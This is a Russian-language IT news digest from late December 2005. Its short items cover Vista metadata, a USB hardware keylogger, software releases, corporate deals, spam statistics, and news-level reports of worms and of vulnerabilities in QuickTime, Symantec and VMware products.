В анонсированной новой версии операционной системы Microsoft Windows Vista неадекватная система управления метаданными (данными о данных), утверждают эксперты Gartner в своем докладе. В Vista метаданные (ключевые слова и др.) используются в описании документа для быстрого поиска файлов. Авторы доклада призвали организации, которые планируют инсталлировать Vista, применять строгие политики метаданных, а также инструменты сторонних производителей для их безопасного использования. «Организации, которые ошибочно опубликуют или вышлют документы с конфиденциальными метаданными, дорого заплатят за это», говорится в докладе. В качестве примера аналитики приводят получение партнером документа, в метаданных которого написано «для малоценных клиентов». В Vista будет инструмент удаления метаданных, но, по мнению экспертов аналитической компании, полностью проблему это не решит. При использовании данного инструмента генерируется «чистая» копия, и остается шанс на ошибочную отправку первого документа.
CNews

25/12/2005 11:47 Созданы электронные шпионы для USB-клавиатур
Компания DesignREM выпустила устройства KeyPhantom, записывающие нажатия на клавиши. Эти аппаратные снифферы могут запомнить до полутора миллионов нажатий в собственной памяти, сообщает BIOS Magazine. Устройства полезны в тех случаях, когда надо восстановить забытый пароль или выяснить причину сбоя системы. Они пригодятся и для отслеживания действий сотрудников или восстановления стёртого текста. KeyPhantom подключается к USB-клавиатуре и пропускает её данные через себя в компьютер. Во встроенной памяти KeyPhantom Home объёмом 128 килобайт можно сохранить до ста тысяч нажатий, версии KeyPhantom Corporate (512 килобайт) и Forensic (два мегабайта) запоминают около 400000 и 1500000 нажатий соответственно. Последние, предназначенные для корпоративного использования, могут шифровать сохранённые данные с длиной ключа в 48 и 128 бит. Версия Forensic также записывает дату и время событий. KeyPhantom не требует установки драйверов и специального ПО. Работать устройство начинает сразу по включении, а для доступа к его настройкам и функциям достаточно любого текстового редактора. Набрав пароль "phxlog", пользователь открывает меню в стиле MS-DOS и может производить операции с памятью KeyPhantom, менять пароль и прошивку и выполнять диагностику. Дополнительная польза от KeyPhantom - удлинение кабеля клавиатуры на 50 сантиметров. В продажу устройства KeyPhantom Personal, Corporate и Forensic поступят в первом квартале 2006 года по цене 199, 269 и 349 долларов США соответственно.
Источник

25/12/2005 10:34 7 типичных ошибок PHP-програмистов
На сайте SitePoint, на котором публикуются различные материалы, посвящённые Вэб-дизайну и программированию, опубликована статья Пакса Дикинсона (Pax Dickinson) под названием "Top 7 PHP Security Blunders", в которой автор описывает 7 наиболее типичных ошибок, приводящих к уязвимости Вэб-сайта, на котором работает уязвимый скрипт. В связи с широким распространением в последнее время PHP в качестве скриптового языка, для обеспечения динамического контента Вэб-серверов, статья будет наверняка полезна начинающим программистам.
Статья

25/12/2005 10:02 Sun: Формат документов OpenDocument (ODF) необходим
Руководство Sun Microsystems считает, что для сохранения мировой информации необходим стабильный открытый формат документов. Выступив в среду перед группой репортеров в Сан-Франциско, ответственный за открытое ПО в Sun сказал, что такой формат, как OpenDocument (ODF), необходим для предотвращения постоянной угрозы того, что он называет «корпоративной болезнью Альцгеймера». «Мне нужна уверенность, что когда мои внуки будут изучать в университете историю, они смогут читать оригинальные документы», — отметил директор Sun по open source Саймон Фиппс (Simon Phipps). По его словам, через десятилетия без стандарта, который будет оставаться стабильным и широко используемым, открыть документы будет невозможно. Sun выставила Фиппса, гуру XML Тима Брея (Tim Bray) и нескольких других топ-менеджеров перед прессой в тот же день, когда в Массачусетсе проходили очередные слушания по поводу проекта обязательного использования OpenDocument в качестве основного формата, начиная с 2007 года. Между тем Microsoft попыталась успокоить критиков, передав форматы файлов Office 12 в Ecma, организацию по стандартизации, отдельную от группы, сертифицировавшей OpenDocument. Sun, бывший член Ecma, критиковала эту организацию за ее процесс и критерии членства. Работу технического комитета Ecma спонсируют Intel и Apple Computer, тогда как Sun, IBM, Red Hat и другие встали на защиту OpenDocument.
ZDNet

24/12/2005 12:33 В Санкт-Петербурге появился Wi-Fi для мобильных
Интернет-провайдер Quantum Communications и телефонная компания «Телфин» заявили о планах реализации проекта по оснащению северной столицы точками Wi-Fi. Это даст возможность жителям Петербурга при наличии мобильного телефона с поддержкой Wi-Fi или специального Wi-Fi-телефона в точке доступа сделать звонок в любую точку мира или сделать звонок любому абоненту из множества SIP-сетей. Ведущие компании мира уже сейчас предлагают телефоны-гибриды (коммуникаторы), способные работать как в сетях мобильных операторов, так и Wi-Fi-провайдеров. Во всем мире публичный беспроводной доступ в интернет или Wi-Fi уже пользуется большой популярностью. Аудитория Wi-Fi составляет уже более 30 млн. человек, а число точек подключения, хот-спотов, превышает 100 тыс. В России Wi-Fi пока набирает обороты. Преимущество Wi-Fi заключается в том, что он обеспечивает большую скорость соединения (в 100 и более раз быстрее модемного).
Сеть «Quantum Wi-Fi» работает на территории Санкт-Петербурга в кафе, гостиницах и развлекательных центрах. Помимо вышесказанного, у пользователей Wi-Fi-телефонии есть также возможность общаться с абонентами внутри SIP-сети «Телфин», а также с абонентами других SIP-сетей, с которыми у компании есть пиринговое соглашение.
Более подробно

24/12/2005 12:02 За электронный шпионаж под домашний арест
Мировой суд Иерусалима отправил сегодня под домашний арест сроком на пять дней Яакова Твика (30), подозреваемого в том, что он получил доступ к электронной почте своей бывшей компании и передавал полученную таким образом информацию конкурентам. Согласно материалам следствия, Твик использовал электронную переписку, которую вели руководители и сотрудники компании, чтобы собрать информацию о ценах. Затем он передавал полученные сведения руководству фирмы, в которую устроился после увольнения. Это позволяло фирме предлагать свои услуги по более низким ценам и переманивать клиентов. После того, как об этом стало известно компании, откуда уволили Твика, она обратилась в полицию. Разобраться в этой истории было поручено отделу по борьбе с компьютерной преступностью. Как сообщили следователи, Твик признался в нескольких случаях использования чужой электронной почты. При обыске в его доме был найден лэптоп, в котором хранились некоторые из перехваченных ими электронных писем.
Источник

24/12/2005 11:50 Выход NetBSD 3.0
Вчера была выпущена версия 3.0 операционной системы NetBSD. Как написано в анонсе, это 11 релиз с начала выпуска, включающий в себя дистрибутив для 53 платформ. NetBSD 3.0 содержит значительные улучшения в стабильности, производительности и т.д. и т.п. Так же добавлена поддержка двух новых платформ: iyonix и hp700. Также в новый релиз включены: PAM (OpenPAM), TCP SACK, TCP MD5, pf(4), IPsec ESP/IKE over NAT, IPv4 PIM, tap(4).
Анонс

24/12/2005 11:36 Дума приняла законопроект, отменяющий оплату входящих звонков на мобильные телефоны
Госдума приняла во втором чтении поправки в закон "О связи", отменяющие оплату входящих звонков на мобильные телефоны. Законопроект был разработан группой депутатов фракции "Единая Россия".
ИТАР-ТАСС

24/12/2005 11:14 IBM покупает производителя ПО для компьютерных сетей
Корпорация IBM заключила соглашение о покупке софтверной фирмы Micromuse, базирующейся в Сан-Франциско. Приобретение обойдется IBM в 865 млн. долларов США - компания выкупит акции Micromuse по 10 долларов США за штуку, что почти на 40% превышает их стоимость в момент закрытия торгов на Нью-Йоркской фондовой бирже 20 декабря. Сделка должна быть одобрена владельцами ценных бумаг Micromuse и регулирующими органами США. Планируется, что закрытие сделки произойдет в первом квартале 2006 года. Компания Micromuse специализируется на поставке масштабируемых программных решений для систем операционной поддержки и обеспечения бизнес-процессов в реальном времени. Продуктами компании для компьютерных сетей пользуются банки, поставщики телекоммуникационных услуг, а также для правительственные и другие организации. Приобретение поможет IBM укрепить свои позиции на рынке ИТ-услуг. После слияния Micromuse войдет в состав подразделения IBM Tivoli, которое занимается производством программного обеспечения. Софтверные технологии и решения компании пополнят продуктовую линейку Tivoli и будут реализовываться через торговые каналы Micromuse и IBM, а также через бизнес-партнеров IBM.
Подробности

24/12/2005 10:42 Microsoft и Google уладили дело по Кайфу Ли
Компании Google и Microsoft заявили об урегулировании конфликта, связанного с переходом на работу в Google одного из вице-президентов Microsoft китайца Кайфу Ли (Kai-Fu Lee). Как ранее сообщалось, в конце этого лета Ли внезапно покинул занимаемый пост, чтобы возглавить вновь создаваемое китайское подразделение Google. Microsoft охарактеризовала это как кадровую диверсию и подала в суд, обвинив Ли в несоблюдении трудового договора и потребовав запретить ему работать в Google, пока не пройдут сроки давности по закрытой корпоративной информации. Судебное разбирательство привело к тому, что компании согласились на урегулирование конфликта. Ли было позволено работать на новом месте, но были оговорены временные ограничения на его деятельность.
Источник

23/12/2005 16:02 Интернет: Санта-червь и Санта-троянский конь
В системах обмена быстрыми сообщениями America Online, Microsoft MSN и Yahoo распространяется новый вирус. Как сообщает CNET, червь IM.GiftCom.All обманывает пользователей, предлагая им просмотреть файл с изображением Санта-Клауса от имени человека, входящего в их личный список контактов. Открывшие предложенную ссылку действительно видят изображение Санты, однако параллельно с просмотром картинки происходит установка на компьютер вирусной программы. Программа предназначена для обхода антивирусного программного обеспечения с целью установки удаленного контроля над компьютером. После захвата компьютера происходит рассылка исходного сообщения с ссылкой на вирус всем контактам в личной базе пользователя. Компания-разработчик систем обмена быстрыми сообщениями Imlogic, впервые сообщившая о вирусе, присвоила червю средний уровень опасности. Другой недавно появившийся "праздничный" вирус распространяется по электронной почте, передает InfoWorld. MerryX.A представляет собой вирус вида "троянский конь" и предлагает получателю письма с пожеланием счастливого Рождества открыть вложенный файл с анимацией. При открытии файла воспроизводится анимированный фильм о Санта-Клаусе, раздающем подарки, и осуществляется установка на компьютер вредоносной программы, скрывающейся под названием SQLServer.exe. "Троян" передает сведения о зараженном компьютере удаленному пользователю и пытается загрузить файлы на локальный диск, среди которых могут быть другие вирусы.
Источник

23/12/2005 13:31 Обнаружен новый червь для Linux
Вчера утром в интернете появился новый червь для Linux — это уже второй новый червь для Linux за последние пару месяцев (первым был Net-Worm.Linux.Lupper), сообщает "Лаборатория Касперского". Червь получил название Net-Worm.Linux.Mare.a. Для своего распространения Mare.a использует php include. Вместе с червем также распространяется новая версия IRC-бота Backdoor.Linux.Tsunami.
Подробности

23/12/2005 13:22 В Apple QuickTime найдена уязвимость
Обнаружена уязвимость в плеере Apple QuickTime, которая позволяет удаленному пользователю вызвать отказ в обслуживании приложения или выполнить произвольный код на системе. Уязвимость существует из-за ошибки при обработке файлов .mov. Удаленный пользователь может с помощью специально сформированного .mov файла вызвать повреждение памяти и аварийно завершить работу приложения. Также возможно выполнение произвольного кода. Уязвимости присвоен рейтинг опасности «средняя». Уязвим Apple QuickTime Player 7.0.3. Для использования уязвимости есть эксплойт. В настоящее время способов устранения уязвимости не существует.
Источник

23/12/2005 12:14 Автоматизированный подсчет голосов можно использовать для манипуляций с результатами выборов
Система ГАС «Выборы», используемая для автоматического подсчета голосов избирателей на федеральных и региональных выборах, далека от совершенства. Такой неутешительный для главы Центризбиркома Александра Вешнякова вывод сделал вчера начальник управления ФСБ по Томской области Александр Давыдов. По его словам, была пресечена попытка незаконного, более того, за деньги, изменения данных системы. Эксперты «НИ» уверены, что с помощью ГАС «Выборы» власть может легко манипулировать результатами голосований. Начальник УФСБ по Томской области Александр Давыдов решил, что наблюдение за ходом выборов также входит в компетенцию спецслужб, и дал публичную оценку тому, как работает внедряемая с 2002 года автоматизированная система «Выборы». Он разоткровенничался настолько, что сообщил: «В этом году была попытка за деньги внести изменения в систему ГАС «Выборы», этот человек уволен». Впрочем, начальник УФСБ отказался назвать фамилию и должность упомянутого гражданина. «Наша задача, чтобы выборный процесс не использовался радикальными группировками для пропаганды своих идей, для продвижения своих людей в органы власти, – подчеркнул, также, г-н Давыдов. – Кроме того, есть организованные преступные группировки межрегионального уровня, которые стараются посадить своих людей в органы власти, чтобы потом прийти в регион и участвовать в распределении заказов, объектов». Станет ли сообщение высокопоставленного сотрудника ФСБ поводом к пересмотру отношения власти к ГАС «Выборы», неизвестно. Одно понятно: она пока недостаточно надежна для того, чтобы полностью автоматизировать подсчет голосов на выборах всех уровней и обеспечить чистоту результатов.
Более подробно

23/12/2005 11:52 Microsoft планирует атаку на Google
Софтверный гигант воспользуется своим доминированием на рынке ПК, чтобы конкурировать с Google в сфере поиска и рекламы, утверждают эксперты. Компания Time Warner выбрала Google в качестве наиболее подходящего партнера для своего интернет-подразделения America Online — однако Microsoft, оказавшаяся в положении отвергнутого поклонника, не считает игру законченной. Потратив большую часть года на обхаживание AOL в попытке заполучить ее поисковый бизнес, Microsoft проиграла Google. Во вторник Google и AOL объявили, что Google инвестирует $1 млрд в 5% акций AOL в рамках широкого партнерства, которое добавляет к существующему сотрудничеству в области поисковой машины сотрудничество в сфере рекламы, интернет-пейджинга и видео. Google предлагает также кредит в $300 млн, который AOL может расходовать на покупку у Google рекламы в результатах поиска. К тому же AOL сможет продавать на сайтах Google все виды рекламы, а на сайтах издателя будет крутиться реклама поискового гиганта. Кроме того, Google поможет AOL эффективнее предъявлять свой контент поисковому роботу Google. Однако учитывая, что соглашение по поисковым машинам между AOL и Google существует уже три года, для Microsoft, «по большому счету, ничего особенно не изменилось», говорит аналитик JupiterResearch Майкл Гартенберг. «С точки зрения Microsoft возможность заключить сделку с AOL была привлекательной, но не жизненно важной». В будущую версию Windows с кодовым названием Vista компания Microsoft планирует интегрировать локальный поиск и со временем распространить его на интернет. «Когда поиск станет составной частью Windows, Google придется несладко».
Подробности

23/12/2005 11:37 Во Франции хотят легализовать пиринговые сети
Нижняя палата французского парламента одобрила две поправки к закону, которые разрешают использование пиринговых сетей для обмена файлами, защищенными авторскими правами. Звукозаписывающие и кинокомпании утверждают, что Р2Р-сети в интернете используются едва ли не исключительно с целью обмена пиратскими материалами. Борьба с файлообменом ведется в США, Канаде, Великобритании и многих других странах. Во Франции, например, Министерство культуры совместно с местными ассоциациями звукозаписывающих компаний разрабатывают новый закон о копирайте, запрещающий использование для загрузки музыки и видео программ с открытым исходным кодом. Теоретически данная инициатива позволит реализовать в ПО для файлообмена функции DRM-защиты и тем самым снизить уровень пиратства. Однако поправки к закону о защите авторских прав, принятые нижней палатой французского парламента, могут свести все усилия Минкультуры и владельцев копирайта на нет. Как сообщает агентство France-Presse, поправки позволяют скачивать защищенные авторскими правами материалы через Р2Р-сети для некоммерческого использования при условии выплаты незначительных отчислений. Такие отчисления в размере нескольких евро, например, могут быть добавлены к ежемесячной плате за использование широкополосного канала доступа к интернету.
"Компьюлента"

23/12/2005 10:43 Ошибка в антивирусном ПО Symantec представляет «высокий» риск
В антивирусном ПО Symantec есть уязвимость, которую злоумышленники могут использовать для перехвата контроля над системой, предупредила компания во вторник вечером. Согласно Symantec, баг, который влияет на целый ряд программных средств безопасности компании, представляет «высокий» риск. Датская секьюрити-фирма Secunia расценивает его как «высококритичный». В рекомендации Secunia говорится, что он проявляется в большинстве продуктов Symantec, включая версии Symantec AntiVirus, Symantec Norton AntiVirus и Symantec Norton Internet Security для корпоративных и индивидуальных пользователей на платформах Windows и Macintosh. Уязвимость находится в Symantec AntiVirus Library, которая обеспечивает поддержку форматов файлов для анализа вирусов. «При декомпрессии файлов RAR Symantec допускает множество переполнений кучи (heap overflows), что позволяет злоумышленникам получить контроль над защищаемой системой, — говорит консультант по безопасности Алекс Уилер, который первым обнаружил ошибку. — Эти уязвимости могут использоваться дистанционно, без вмешательства пользователя в конфигурациях по умолчанию через обычные протоколы, такие как SMTP». Пока уязвимость обнаружена только в версии Dec2Rar.dll 3.2.14.3 и в принципе, по словам Уилера, может затрагивать все продукты Symantec, использующие этот DLL. Symantec еще не выпустила поправку для решения этой проблемы. Пока Уилер рекомендует пользователям запретить сканирование RAR-компрессированных файлов.
Более подробно

23/12/2005 10:28 Евросоюз снова угрожает Microsoft штрафами
Власти Евросоюза в очередной раз обвинили европейские представительства корпорации Microsoft в невыполнении требований суда об ограничениях на продаваемую продукцию и снова пообещали прибегнуть к санкциям. Как известно, эти требования были наложены на Microsoft в рамках антимонопольного процесса, проходившего весь прошлый год. По итогам, корпорация должна была начать выполнять требования суда с 1 июня 2005 года, в противном случае компании грозил штраф в 497 миллионов евро с ежедневными выплатами по 5 миллионов. Одно из требований предписывало прекратить на территории Евросоюза продажу ОС Windows XP со встроенным медиаплейером Windows Media Player (WMP), также предписывалось упростить условия доступа к исходным кодам Windows для сторонних европейских разработчиков. Корпорация пыталась обжаловать это решение в судах нескольких инстанций, но ей это не удалось. Функционеры Microsoft заявляли, что будут и далее продолжать попытки, но пока компания обязана выполнять требования. В частности, в Европе уже поступила в продажу специальная версия "Windows XP Home Edition N" без встроенного WMP.
Подробности

22/12/2005 15:59 В 2005 г. в США спам составил 67% всей электронной почты
Количество нежелательных электронных сообщений, получаемых адресатами в Соединенных Штатах, сокращается благодаря новым законам и применению современных технологий, говорится в докладе Федеральной торговой комиссии США. Спам по-прежнему раздражает пользователей, однако они получают его сегодня меньше, чем еще два года назад, отмечает ФТК. Это связано с использованием спам-фильтров и введением закона, позволяющего пользователям отказываться от получения нежелательных писем. Закон против спама, называющийся CAN-Spam, был принят в США в январе 2004 года.По данным комиссии, в настоящее время на спам приходится 67% всей электронной почты, проходящей через фильтры, что на 9% меньше, чем в 2004 году.
Источник

22/12/2005 14:08 Перевод на русский язык плана работы над GPL 3
Сергей Мороз перевел план работы над новой версией главной лицензии, под которой публикуется свободный софт - GPL3. На очереди другие документы из этой серии.
Перевод

22/12/2005 13:19 Уязвимость в VMWare
В популярном ПО виртуализации VMWare обнаружена уязвимость, сообщает Tim Shelton. Уязвимость присутствует в ПО для ОС Windows (NT/2k/XP/2k3) в пакетах: Workstation, GSX Server, Ace, Player. Отсутствует в VMWare ESX Server. Сама природа уязвимости связана с использованием режима NAT (сетевая трансляция адресов) при помощи утилиты vmnat.exe, использование которой может позволить атакующему попасть в область памяти пользователя (userland space) и компрометировать систему (выполнить произвольный код). Как выяснил автор, для использования уязвимости необходимо сформировать специальные 'EPRT' и 'PORT' команды при использовании протокола FTP. При этом происходит переполнение буфера в куче с перезаписью регистров ECX, EDI, EBX. Для устранения уязвимости производителями выпущена обновлённая версия ПО. При невозможности обновления рекомендуют сервис NAT в настройках.
Подробное описание

22/12/2005 12:52 Пакетный фильтр OpenBSD PF портирован под Windows
Компания Core Security Technologies выпустила бесплатный межсетевой экран для Windows 2000/XP построенный на базе портированного из OpenBSD пакетного фильтра PF, сообщает opennet.ru. Желающие могут его скачать и испытать.
Подробности

22/12/2005 12:39 IBM открывает кластерную файловую систему GPFS
Корпорация IBM начала поставки файловой системы General Parallel File System (GPFS) через своего партнера, компанию Linux Networkх Inc, третьим поставщикам. Файловая система GPFS предназначена для сетевых дисков, работающих в кластерной среде под управлением ОС Linux или IBM AIX. На сегодняшний день эту высокопроизводительную ФС могут получить производители дистрибутивов Linux и независимые поставщики. В аппаратном плане GPFS поддерживают следующие серверы: IBM eServer Cluster 1600 и eServer Cluster 1350, а также вся линейка серверов pSeries, OpenPower, xSeries и BladeCenter. Linux Networkх, занимающаяся построением высокопроизводительных кластеров и суперкомпьютеров на базе ОС Linux, на днях заключила с IBM OEM-соглашение, согласно которому первая будет также заниматься активным продвижением GPFS на рынок в первой четверти 2006 года, в частности серия кластеров Advanced Technology Clusters будет в следующем году комплектоваться этой ФС в обязательном порядке. По словам представителей IBM, корпорация планирует продолжить разработки этой ФС и подключить к ним свежие силы разработчиков, а после того, как GPFS будет работать на большинстве аппаратных платформ, IBM планирует позиционировать ее как полноценное открытое решение для крупных высокопроизводительных корпоративных сетей.
Подробности

22/12/2005 12:15 2006 год: сотни вирусов атакуют смартфоны
Число хакерских атак на мобильные средства связи в будущем году утроится. Это связано с широким распространением смартфонов, а также с существенным увеличением количества новых вирусов для них. При этом темпы роста количества вредоносных программ для смартфонов будут существенно опережать аналогичный показатель у вирусов для ПК. По мнению американских специалистов из компании McAfee Avert Labs, к концу 2006 года будет создано около 726 вредоносных программ для смартфонов. Это очень большая цифра, если учесть, что сейчас в мире существует около 226 подобных программ. По данным исследователей, большинство граждан просто не готовы к подобным атакам: они не предполагают, что хакерские атаки на их мобильные средства связи могут нанести им ущерб, сопоставимый с аналогичными атаками на ПК. Однако в McAfee Avert Labs заверили: если вирус подобный знаменитому Love Letter (поразил в 2000 году в течение нескольких часов миллионы компьютеров), будет направлен на смартфоны, распространяться он будет гораздо быстрее и сможет одновременно поразить около 200 млн смартфонов одновременно. Этому в значительной степени способствует то обстоятельство, что большинство владельцев смартфонов не устанавливает на них соответствующее антивирусное ПО.
Источник

22/12/2005 11:35 Патч для ядра Linux
Некто Breno из Бразилии в списке рассылки Bugtraq опубликовал ссылку на патч для ядра Linux 2.6.11, предназначенный для повышения безопасности. Как пишет сам автор, в патче реализованы следующие функции: проверка адреса EIP при выполнении системных вызовов sys_execve и sys_open, проверка сигнатур шелл-кода в области памяти при выполнении argv и env, защита от выполнения форк-бомб (fork bomb) и т.д. C остальными улучшениями желающие могут ознакомиться, скачав патч.
Патч

22/12/2005 11:15 FTC обвинили в преуменьшении проблемы спама
Доклад Федеральной комиссии США по торговле (FTC) перед Конгрессом о том, что антиспамерский закон помог уменьшить количество нежелательных рекламных е-мэйлов, вызвал скептические отзывы у представителей индустрии защитных систем. Закон о борьбе со спамом был принят два года назад и неоднократно критиковался за недееспособность. В докладе также был упомянут технологический прогресс по фильтрованию. «Мы не наблюдали ни одного случая, когда спам действительно шел на спад», — сказал Джордан Риттер (Jordan Ritter), сооснователь Cloudmark — компании почтовой безопасности из Сан-Франциско. «Как в принципе мог сработать закон, если спамерам достаточно лишь перенести источник рассылок за границу?» — говорит он. Доклад FTC был основан на двух исследованиях. Одно, проведенное компанией фильтрования почты, MX Logic, утверждает, что спам составляет 67% всех электронных писем, прошедших через ее системы за первые 8 месяцев года. Это на 9% меньше, чем за тот же период 2004 г. Второе — от другой компании фильтрования спама — MessageLabs — утверждает, что объемы спама росли в основном в прошлом году, но затем снизились до уровня декабря 2003 года, когда закон против незваной рекламы был принят Конгрессом. Несмотря на это, комиссия признала, что спам остается главной головной болью, и не считает, что преуменьшила проблему. «На самом деле мы не говорим, что проблема спама решена», — сказала директор бюро FTC по защите потребителей Лидия Парнс (Lydia Parnes): — «Мы говорим лишь о признаках прогресса».
Источник

22/12/2005 10:38 Обзор расширений Mozilla Firefox
На сайте iXBT опубликована довольно полезная статья, в которой автор (Юрий Меркулов) подробно описывает основные плагины (расширения) для всё более популярного в крайнее время браузера Firefox, выпускаемого и поддерживаемого Mozilla Foundation.
Статья

22/12/2005 10:02 Seagate покупает Maxtor
Seagate намерена приобрести своего конкурента Maxtor за $1,9 млрд — об этом компании объявили в среду утром. Совет директоров Maxtor уже принял предложение о покупке, но его должны утвердить акционеры и регулирующие органы. В случае утверждения сделки новая компания будет называться Seagate, причем существующим акционерам Seagate будет принадлежать примерно 84% объединенной компании. Остальные 16% акций окажутся в руках акционеров Maxtor. По словам генерального директора Seagate Билла Уоткинса, слияние будет означать, что заказчики смогут покупать более качественные продукты по более низкой цене. «Благодаря масштабам объединенной компании, мы сможем снизить себестоимость продуктов и выпускать более инновационные изделия по более конкурентным ценам», — говорится в его заявлении. В результате поглощения Seagate, и без того лидер рынка жестких дисков, сможет увеличить свои прибыли на 20%. Однако у Maxtor в третьем квартале этого года было на $17 млн убытков, которые компания объясняет отчасти проблемами с производством дисков высокой емкости.
Более подробно

22/12/2005 09:57 Microsoft прекращает поддержку Mac IE
Тем немногим пользователям Мас, которые еще работают с браузером Internet Explorer, нужно срочно искать ему замену, так как с 31 декабря Microsoft прекращает поддержку IE. Опубликованное в пятницу заявление не должно было стать полной неожиданностью для пользователей Мас: еще в 2003 году Microsoft объявила, что она прекратит поддержку IE для Мас. Компания не обновляла эту программу три года, оставив ее на уровне IE 5, — для нее нет версии 6, которая предлагается пользователям Windows. IE для Мас будет доступным еще месяц после окончания поддержки, однако Microsoft рекомендует всем пользователям переходить на «более современную технологию браузинга, такую как Apple Safari». Отсутствие поддержки IE вряд ли приведет в замешательство пользователей Apple, большинство из которых уже применяют альтернативы. Единственная потенциальная трудность может быть связана с тем, что некоторые сайты работают только с IE. Таких сайтов немного, но полностью проблема не решена. Например, в июне компания по веб-тестированию SciVisum утверждала, что каждый десятый веб-сайт в Великобритании не работает как следует с Firefox, популярным браузером с открытым исходным кодом. Для Mac OS X предлагаются Firefox, Safari и другие браузеры, такие как Opera.
Подробности

21/12/2005 13:06 Реализация поддержки системы IDN в IE7 почти завершена
Работы по реализации поддержки системы неанглоязычных доменных имен (International Domain Names, IDN) в браузере Microsoft Internet Explore 7 уже практически завершены. Как отмечает Вишу Гупта, один из разработчиков IE, поддержка IDN войдет в состав публичной бета-версии браузера, которая, как ожидается, появится уже в начале следующего года. По принятым стандартам доменные имена должны состоять только из символов ASCII, то есть, букв латинского алфавита, цифр и дефиса. При работе с неанглоязычными доменными именами используется так называемый механизм Punycode, который позволяет представлять имена, содержащие символы в кодировке Unicode, в виде определённой последовательности ASCII-символов. Механизм Punycode обеспечивает уникальность доменных имен и их относительно небольшую длину в представлении ASCII. С ростом количества неанглоязычных доменных имен в интернете будет увеличиваться и количество фишерских сайтов, названия которых похожи на названия известных ресурсов. Для борьбы с такими веб-страницами в седьмой версии Internet Explore появятся специализированные средства. Вишу Гупта, в частности, отмечает, что в ряде случаев IE7 будет отображать доменные имена как Punycode. Происходить это будет, например, если имя содержит символы, входящие в алфавиты сразу нескольких языков.
Источник

21/12/2005 12:06 Google купила 5 процентов акций AOL
Компания Google покупает 5 процентов акций компании America Online (AOL) за 1 миллиард долларов, сообщает Associated Press. Заключению сделки предшествовали несколько месяцев переговоров, в ходе которых также рассматривалась возможность продать эти акции компании Microsoft. О предстоящей сделке с Google мировые СМИ сообщали в течение последних нескольких дней, ссылаясь на близкие к участникам переговорного процесса компетентные источники. Вместе с тем, в течение последних месяцев регулярно появлялись слухи о других возможных договоренностях, касающихся судьбы акций AOL. Так, в октябре появилась информация о том, что половину веб-бизнеса AOL намереваются совместно выкупить Google и магистральный провайдер Comcast. Эти сведения опроверг Ричард Парсонс (Richard Parsons), глава медиахолдинга Time Warner, в который входит AOL. Он тогда также заявил, что у этой компании нет проекта по информационному сотрудничеству с Microsoft, несмотря на ходившие тогда соответствующие слухи.
Источник

21/12/2005 10:19 Жителей Техаса хотят подключить к Интернету по электросети
Американская энергетическая компания TXU совместно с провайдером Current Communications начинает работы по созданию сети высокоскоростного доступа в Интернет по электрической сети для жителей штата Техас. Как сообщает Associated Press, в проект планируется вложить 150 миллионов долларов, начать работу он должен к концу 2006 года. В ближайшее время Current Communications планирует начать построение сети по своей технологии Smart Grid, используя инфраструктуру TXU. Сеть предполагается также использовать для создания более устойчивой к авариям энергосети, в рамках которой при обрыве на одном участке электричество распределяется по другим. Кроме того, такая сеть позволяет производить эффективный биллинг за потребленную электроэнергию. Интернет в Smart Grid будет предоставляться с использованием технологии BPL ("broadband-over-power line", "широкополосная связь по электролинии"). Сообщается, что проект намерен напрямую конкурировать с существующими интернет-провайдерами, работающими в этом регионе - планируется охватить около 2 миллионов клиентов. Это будет крупнейший в мире проект подобного рода. Сети интернет-доступа на базе BPL в настоящее время развиваются в нескольких странах мира. В США и Канаде уже есть несколько десятков тысяч пользователей, подключенных по этой технологии. Интернет-связь по BPL сравнима по качеству и скорости с традиционными видами интернет-подключений. В развитие BPL-технологий инвестируют средства некоторые крупные компьютерные компании, например, Google, которая минувшим летом инвестировала несколько миллионов долларов в упомянутую Current Communications.
Подробности

19/12/2005 12:50 Пара резисторов вместо квантовой криптографии
Профессор техасского университета Ласло Киш предложил схему обеспечения безопасного канала связи, на первый взгляд дающую результаты, аналогичные тем, что пытаются достичь, вбухав миллионы долларов в квантовую криптографию, сообщает bugtraq.ru. Схема проста до безобразия: обе стороны на каждом такте случайным образом подключают к двухпроводной передающей цепи резисторы, имеющие разное сопротивление (скажем, один резистор из пары с сопротивлениями 10 и 1000 Ом), после чего измеряют силу тока в цепи. Зная величину своего сопротивления, каждая сторона элементарно определяет, что подключил ее визави, в то время как постороннему наблюдателю, врезавшемуся в линию, известна только сумма сопротивлений. Переданная таким образом информация вполне может быть использована в качестве сессионного ключа для любого классического криптоалгоритма. Разумеется, не исключено, что в схеме есть и подводные камни, которые вполне могут возникнуть при смешении дискретного мира криптографии с аналоговым миром цепей и сопротивлений. Кроме того, пропускная способность ее невелика - порядка двух килобит при километровом линке. Наконец, она защищает только от пассивного прослушивания и уязвима к аткам man-in-the-middle, поэтому требует дополнительной аутентификации. Впрочем, квантовое распределение ключей страдает примерно теми же проблемами, оставаясь на несколько порядков дороже. Да и сама идея как минимум любопытная.
Более подробно

19/12/2005 12:29 Плагин для Firefox передает запросы в Google
Новый плагин для браузера Firefox от Google, предназначенное для "безопасного веб-серфинга через Firefox", защищает пользователя от фишинга, но при этом передает все его запросы с параметрами на сервер Google. Об этом сообщил эксперт по безопасности Нитеш Данжани (Nitesh Dhanjani), который проанализировал процесс работы плагина. Плагин отсылает все данные на сервер-посредник (прокси-сервер), который, в свою очередь, фильтрует сайты, находящиеся в "черном списке фишинга" и отслеживает страницы на предмет фишерских приемов подделки сайтов платежных и других коммерческих систем. Данжани обнаружил, что через сервер Google проходят все запросы, начиная от URL сайта, что само по себе не столь опасно, и заканчивая переданными в URL персональными параметрами (запрос типа GET, передающий данные форм в строке URL). Все данные передаются без шифрования.
CNews

19/12/2005 11:47 Dasher-B атакует компьютеры с Windows
Как только Microsoft выпустила бюллетень безопасности MS05-051 и обновление для описанных в нем уязвимостей, как в Сети появился червь, эксплуатирующий одну из закрытых дыр. Проблема осложняется ошибками, возникающими при установке данного патча. Dasher-B использует уязвимость в координаторе распределенных транзакций Microsoft Windows Distributed Transaction Coordinator (MSDTC) для распространения через системы, на которых не установлено обновление. Под угрозой находятся не только системы XP, но и Windows 2000. В случае успешной эксплуатации уязвимости, червь устанавливает на компьютере "черный ход" и связывается с удаленным сервером для дальнейших инструкций. Удаленный сервер докачивает код червя и клавиатурного шпиона. Компоненты червя прячутся от антивирусов при помощи руткита – инструментария повышения своих прав на системе. В черве в качестве руткита используется драйвер. Главная опасность червя заключается в том, что патч по MS05-051 работает с ошибками и многие могут его не установить, считает старший технологический консультант Sophos Грэм Клули (Graham Cluley).
Источник

19/12/2005 11:24 Интернет-мошенники выдавали себя за доктора Курпатова
